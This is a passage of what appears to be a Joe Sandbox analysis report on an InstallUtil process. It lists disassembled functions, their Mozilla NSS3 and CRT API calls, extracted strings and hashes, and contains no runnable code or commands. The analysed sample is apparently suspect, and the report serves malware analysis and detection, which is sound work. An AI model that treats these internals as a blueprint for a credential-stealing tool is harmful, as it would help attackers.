                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 8544004-0
                                                                                                                  • Opcode ID: c1492b7eaa133315b9af165cdf666b9c2444a591bfcc6eed60da26d3c63b3d5e
                                                                                                                  • Instruction ID: 22efc4734696879ba67f5a1940f57450c0840c59e43ef155bfa86061048d6e8b
                                                                                                                  • Opcode Fuzzy Hash: c1492b7eaa133315b9af165cdf666b9c2444a591bfcc6eed60da26d3c63b3d5e
                                                                                                                  • Instruction Fuzzy Hash: E0318DB5900402ABDB219F15EE8AA45B771FF0132DF184531E80946F62E732F978EBD6
                                                                                                                  Function 6C7A25F0 Relevance: 21.4, APIs: 8, Strings: 6, Instructions: 403stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C7AA0A0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C77A5DF,?,00000000,6C7528AD,00000000,?,6C77A5DF,?,object), ref: 6C7AA0C0
                                                                                                                    • Part of subcall function 6C7AA0A0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C77A5DF,?,00000000,6C7528AD,00000000,?,6C77A5DF,?,object), ref: 6C7AA0E8
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7A2834
                                                                                                                  • memcmp.VCRUNTIME140(00000000,00000020,00000020,?,?,?,?,?,?,?,?), ref: 6C7A284B
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7A2A98
                                                                                                                  • memcmp.VCRUNTIME140(00000000,?,00000020,?,?,?,?,?,?,?,?,?,?), ref: 6C7A2AAF
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7A2BDC
                                                                                                                  • memcmp.VCRUNTIME140(00000000,?,00000010,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A2BF3
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7A2D23
                                                                                                                  • memcmp.VCRUNTIME140(00000000,?,00000010,?,?,?,?,?,?,?,?,?), ref: 6C7A2D34
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmpstrlen$strcmp
                                                                                                                  • String ID: $OQwl$manufacturer$model$serial$token
                                                                                                                  • API String ID: 2407968032-3046293269
                                                                                                                  • Opcode ID: a401fa3b11cf5cf94b3b2bef0a5a31c701a06217ff68f61f75a16162ef89d75c
                                                                                                                  • Instruction ID: 0b143b3102a7f64e10ca6a2eb6b2af7f3effbd4459171f97b38f38bb6d868d96
                                                                                                                  • Opcode Fuzzy Hash: a401fa3b11cf5cf94b3b2bef0a5a31c701a06217ff68f61f75a16162ef89d75c
                                                                                                                  • Instruction Fuzzy Hash: AD02CDA1E0C3C96EF73587A3C98DBE13AE05B0531CF4D16F5D94D8BA93D2AC098A9351
                                                                                                                  Function 6C79EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PORT_Alloc_Util.NSS3(?), ref: 6C79EE0B
                                                                                                                    • Part of subcall function 6C7B0BE0: malloc.MOZGLUE(6C7A8D2D,?,00000000,?), ref: 6C7B0BF8
                                                                                                                    • Part of subcall function 6C7B0BE0: TlsGetValue.KERNEL32(6C7A8D2D,?,00000000,?), ref: 6C7B0C15
                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C79EEE1
                                                                                                                    • Part of subcall function 6C791D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C791D7E
                                                                                                                    • Part of subcall function 6C791D50: EnterCriticalSection.KERNEL32(?), ref: 6C791D8E
                                                                                                                    • Part of subcall function 6C791D50: PR_Unlock.NSS3(?), ref: 6C791DD3
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C79EE51
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C79EE65
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C79EEA2
                                                                                                                  • free.MOZGLUE(?), ref: 6C79EEBB
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C79EED0
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C79EF48
                                                                                                                  • free.MOZGLUE(?), ref: 6C79EF68
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C79EF7D
                                                                                                                  • PK11_DoesMechanism.NSS3(?,?), ref: 6C79EFA4
                                                                                                                  • free.MOZGLUE(?), ref: 6C79EFDA
                                                                                                                  • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C79F055
                                                                                                                  • free.MOZGLUE(?), ref: 6C79F060
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2524771861-0
                                                                                                                  • Opcode ID: 7082ac16308398be9776d0cd56beb04b5cb8e7be93eeac3ea257919a34749539
                                                                                                                  • Instruction ID: bd57b63fcfbf28da04989a7a60a4e1d93d62d6814775dbc16fc9f025119194b1
                                                                                                                  • Opcode Fuzzy Hash: 7082ac16308398be9776d0cd56beb04b5cb8e7be93eeac3ea257919a34749539
                                                                                                                  • Instruction Fuzzy Hash: 2A816371A002099BDF10DFA5ED89AEE77B9BF08318F144035E919A3711E731E964CBE1
                                                                                                                  Function 6C764CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PK11_SignatureLen.NSS3(?), ref: 6C764D80
                                                                                                                  • PORT_Alloc_Util.NSS3(00000000), ref: 6C764D95
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C764DF2
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C764E2C
                                                                                                                  • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C764E43
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C764E58
                                                                                                                  • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C764E85
                                                                                                                  • DER_Encode_Util.NSS3(?,?,6C8B05A4,00000000), ref: 6C764EA7
                                                                                                                  • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C764F17
                                                                                                                  • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C764F45
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C764F62
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C764F7A
                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C764F89
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C764FC8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2843999940-0
                                                                                                                  • Opcode ID: 7329378299d51e5e2cc11bdeca3b5b5f1fd9c3b5d52ae62ea55f1249b1296480
                                                                                                                  • Instruction ID: c6dc27da356d89922f0a0ab7d26698193a8a9bc4e63879406af082d785001b40
                                                                                                                  • Opcode Fuzzy Hash: 7329378299d51e5e2cc11bdeca3b5b5f1fd9c3b5d52ae62ea55f1249b1296480
                                                                                                                  • Instruction Fuzzy Hash: BD81C4719043019FE711CF25DA54B9BB7E8AB84308F18892DFD58DBB40E731EA05CB92
                                                                                                                  Function 6C760470 Relevance: 21.2, APIs: 14, Instructions: 206timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C7604B7
                                                                                                                    • Part of subcall function 6C7B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7587ED,00000800,6C74EF74,00000000), ref: 6C7B1000
                                                                                                                    • Part of subcall function 6C7B0FF0: PR_NewLock.NSS3(?,00000800,6C74EF74,00000000), ref: 6C7B1016
                                                                                                                    • Part of subcall function 6C7B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7587ED,00000008,?,00000800,6C74EF74,00000000), ref: 6C7B102B
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C760539
                                                                                                                    • Part of subcall function 6C7B1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7588A4,00000000,00000000), ref: 6C7B1228
                                                                                                                    • Part of subcall function 6C7B1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C7B1238
                                                                                                                    • Part of subcall function 6C7B1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7588A4,00000000,00000000), ref: 6C7B124B
                                                                                                                    • Part of subcall function 6C7B1200: PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0,00000000,00000000,00000000,?,6C7588A4,00000000,00000000), ref: 6C7B125D
                                                                                                                    • Part of subcall function 6C7B1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C7B126F
                                                                                                                    • Part of subcall function 6C7B1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C7B1280
                                                                                                                    • Part of subcall function 6C7B1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C7B128E
                                                                                                                    • Part of subcall function 6C7B1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C7B129A
                                                                                                                    • Part of subcall function 6C7B1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C7B12A1
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C76054A
                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C76056D
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7605CA
                                                                                                                  • DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6C7605EA
                                                                                                                  • PR_SetError.NSS3(FFFFE00C,00000000), ref: 6C7605FD
                                                                                                                  • PR_SetError.NSS3(FFFFE07E,00000000), ref: 6C760621
                                                                                                                  • PR_EnterMonitor.NSS3 ref: 6C76063E
                                                                                                                  • PR_ExitMonitor.NSS3 ref: 6C760668
                                                                                                                  • CERT_DestroyCertificate.NSS3(?), ref: 6C760697
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7606AC
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7606CC
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7606DA
                                                                                                                    • Part of subcall function 6C75E6B0: PORT_ArenaMark_Util.NSS3(00000000,?,00000000,?,?,6C7604DC,?,?), ref: 6C75E6C9
                                                                                                                    • Part of subcall function 6C75E6B0: PORT_ArenaAlloc_Util.NSS3(00000000,00000088,?,?,00000000,?,?,6C7604DC,?,?), ref: 6C75E6D9
                                                                                                                    • Part of subcall function 6C75E6B0: memset.VCRUNTIME140(00000000,00000000,00000088,?,?,?,?,00000000,?,?,6C7604DC,?,?), ref: 6C75E6F4
                                                                                                                    • Part of subcall function 6C75E6B0: SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7604DC,?), ref: 6C75E703
                                                                                                                    • Part of subcall function 6C75E6B0: CERT_FindCertIssuer.NSS3(?,?,6C7604DC,0000000B,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C75E71E
                                                                                                                    • Part of subcall function 6C75F660: PR_EnterMonitor.NSS3(6C76050F,?,00000001,?,?,?), ref: 6C75F6A8
                                                                                                                    • Part of subcall function 6C75F660: PR_Now.NSS3(?,?,?,00000001,?,?,?), ref: 6C75F6C1
                                                                                                                    • Part of subcall function 6C75F660: PR_ExitMonitor.NSS3(?,?,?,00000001,?,?,?), ref: 6C75F7C8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$ArenaArena_ErrorFree$Monitor$EnterPool$CriticalExitSectionfree$AlgorithmAlloc_CallCertCertificateClearDeleteDestroyFindGeneralizedInitIssuerLockMark_OnceTimeTime_UnlockValuecallocmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2470852775-0
                                                                                                                  • Opcode ID: ff1591789fb3ab3782bf0f7f6138113d0123d11a94962c1f09024a56c47bd1d2
                                                                                                                  • Instruction ID: 645058ec69d763484490967aa70c5284602ef200d9980acab25865e65c362152
                                                                                                                  • Opcode Fuzzy Hash: ff1591789fb3ab3782bf0f7f6138113d0123d11a94962c1f09024a56c47bd1d2
                                                                                                                  • Instruction Fuzzy Hash: 6C61C271A043429FDB10CE2ACE48F5B77E4AB84358F144538FD5997B91E730E918CB9A
                                                                                                                  Function 6C798F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(6C799582), ref: 6C798F5B
                                                                                                                    • Part of subcall function 6C7ABE30: SECOID_FindOID_Util.NSS3(6C76311B,00000000,?,6C76311B,?), ref: 6C7ABE44
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C798F6A
                                                                                                                    • Part of subcall function 6C7B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7587ED,00000800,6C74EF74,00000000), ref: 6C7B1000
                                                                                                                    • Part of subcall function 6C7B0FF0: PR_NewLock.NSS3(?,00000800,6C74EF74,00000000), ref: 6C7B1016
                                                                                                                    • Part of subcall function 6C7B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7587ED,00000008,?,00000800,6C74EF74,00000000), ref: 6C7B102B
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C798FC3
                                                                                                                  • PK11_GetIVLength.NSS3(-00000001), ref: 6C798FE0
                                                                                                                  • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C87D820,6C799576), ref: 6C798FF9
                                                                                                                  • DER_GetInteger_Util.NSS3(?), ref: 6C79901D
                                                                                                                  • PORT_ZAlloc_Util.NSS3(?), ref: 6C79903E
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C799062
                                                                                                                  • memcpy.VCRUNTIME140(00000024,?,?), ref: 6C7990A2
                                                                                                                  • PORT_ZAlloc_Util.NSS3(?), ref: 6C7990CA
                                                                                                                  • memcpy.VCRUNTIME140(00000018,?,?), ref: 6C7990F0
                                                                                                                  • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C79912D
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C799136
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C799145
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3626836424-0
                                                                                                                  • Opcode ID: acef1a48e4a531c348d19440b36db76286f2774ff880607c326f4edaf230825e
                                                                                                                  • Instruction ID: f63cdef4a67be474b111d946995e19e4584cc8e61fb327ec40ce910987016647
                                                                                                                  • Opcode Fuzzy Hash: acef1a48e4a531c348d19440b36db76286f2774ff880607c326f4edaf230825e
                                                                                                                  • Instruction Fuzzy Hash: CD51D2B1A042009FE710CF28EE85B9AB7E5FF94358F044939E85997741E731E949CBD2
                                                                                                                  Function 6C86C8A0 Relevance: 21.1, APIs: 14, Instructions: 94stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • calloc.MOZGLUE(00000001,00000020), ref: 6C86C8B9
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C86C8DA
                                                                                                                  • malloc.MOZGLUE(00000001), ref: 6C86C8E4
                                                                                                                  • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C86C8F8
                                                                                                                  • PR_NewLock.NSS3 ref: 6C86C909
                                                                                                                  • PR_NewCondVar.NSS3(00000000), ref: 6C86C918
                                                                                                                  • PR_NewCondVar.NSS3(00000000), ref: 6C86C92A
                                                                                                                    • Part of subcall function 6C740F00: PR_GetPageSize.NSS3(6C740936,FFFFE8AE,?,6C6D16B7,00000000,?,6C740936,00000000,?,6C6D204A), ref: 6C740F1B
                                                                                                                    • Part of subcall function 6C740F00: PR_NewLogModule.NSS3(clock,6C740936,FFFFE8AE,?,6C6D16B7,00000000,?,6C740936,00000000,?,6C6D204A), ref: 6C740F25
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C86C947
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cond$LockModulePageSizecallocfreemallocstrcpystrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2931242645-0
                                                                                                                  • Opcode ID: 96179b4a4c67bed4568c38bf5d79b3cb5c83f5e3b4430f9e17a437fbbf84adf7
                                                                                                                  • Instruction ID: f2a41c59413c9a0244d7c29fa1fc0aa71a6f23943951741b9f3c567d5f0cbcd7
                                                                                                                  • Opcode Fuzzy Hash: 96179b4a4c67bed4568c38bf5d79b3cb5c83f5e3b4430f9e17a437fbbf84adf7
                                                                                                                  • Instruction Fuzzy Hash: F22184F1A007065BEB206FBA9D0965B76B8AF05258F140939E85BC6E42EB31F514C7E2
                                                                                                                  Function 6C74AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_EnterMonitor.NSS3 ref: 6C74AF47
                                                                                                                    • Part of subcall function 6C819090: TlsGetValue.KERNEL32 ref: 6C8190AB
                                                                                                                    • Part of subcall function 6C819090: TlsGetValue.KERNEL32 ref: 6C8190C9
                                                                                                                    • Part of subcall function 6C819090: EnterCriticalSection.KERNEL32 ref: 6C8190E5
                                                                                                                    • Part of subcall function 6C819090: TlsGetValue.KERNEL32 ref: 6C819116
                                                                                                                    • Part of subcall function 6C819090: LeaveCriticalSection.KERNEL32 ref: 6C81913F
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 6C74AF6D
                                                                                                                  • free.MOZGLUE(?), ref: 6C74AFA4
                                                                                                                  • free.MOZGLUE(?), ref: 6C74AFAA
                                                                                                                  • PR_ExitMonitor.NSS3 ref: 6C74AFB5
                                                                                                                  • PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C74AFF5
                                                                                                                  • PR_ExitMonitor.NSS3 ref: 6C74B005
                                                                                                                  • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C74B014
                                                                                                                  • PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C74B028
                                                                                                                  • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C74B03C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
                                                                                                                  • String ID: %s decr => %d$Unloaded library %s
                                                                                                                  • API String ID: 4015679603-2877805755
                                                                                                                  • Opcode ID: 29c64101f4a4707e2a7e734f320f8dd2f9f86ed14fa45a95741ca1777e465a73
                                                                                                                  • Instruction ID: 67a76a7597c6c5d2c18d5e15a83b9b1de02d9eef947498b1cb245c0dd0c36a3b
                                                                                                                  • Opcode Fuzzy Hash: 29c64101f4a4707e2a7e734f320f8dd2f9f86ed14fa45a95741ca1777e465a73
                                                                                                                  • Instruction Fuzzy Hash: CC3125B4B04102ABEB209F64DE44A1AB7B5EB0632DB18C535E80697F41F332F825C7E5
                                                                                                                  Function 6C796C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C79781D,00000000,6C78BE2C,?,6C796B1D,?,?,?,?,00000000,00000000,6C79781D), ref: 6C796C40
                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C79781D,?,6C78BE2C,?), ref: 6C796C58
                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C79781D), ref: 6C796C6F
                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C796C84
                                                                                                                  • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C796C96
                                                                                                                    • Part of subcall function 6C741240: TlsGetValue.KERNEL32(00000040,?,6C74116C,NSPR_LOG_MODULES), ref: 6C741267
                                                                                                                    • Part of subcall function 6C741240: EnterCriticalSection.KERNEL32(?,?,?,6C74116C,NSPR_LOG_MODULES), ref: 6C74127C
                                                                                                                    • Part of subcall function 6C741240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C74116C,NSPR_LOG_MODULES), ref: 6C741291
                                                                                                                    • Part of subcall function 6C741240: PR_Unlock.NSS3(?,?,?,?,6C74116C,NSPR_LOG_MODULES), ref: 6C7412A0
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C796CAA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
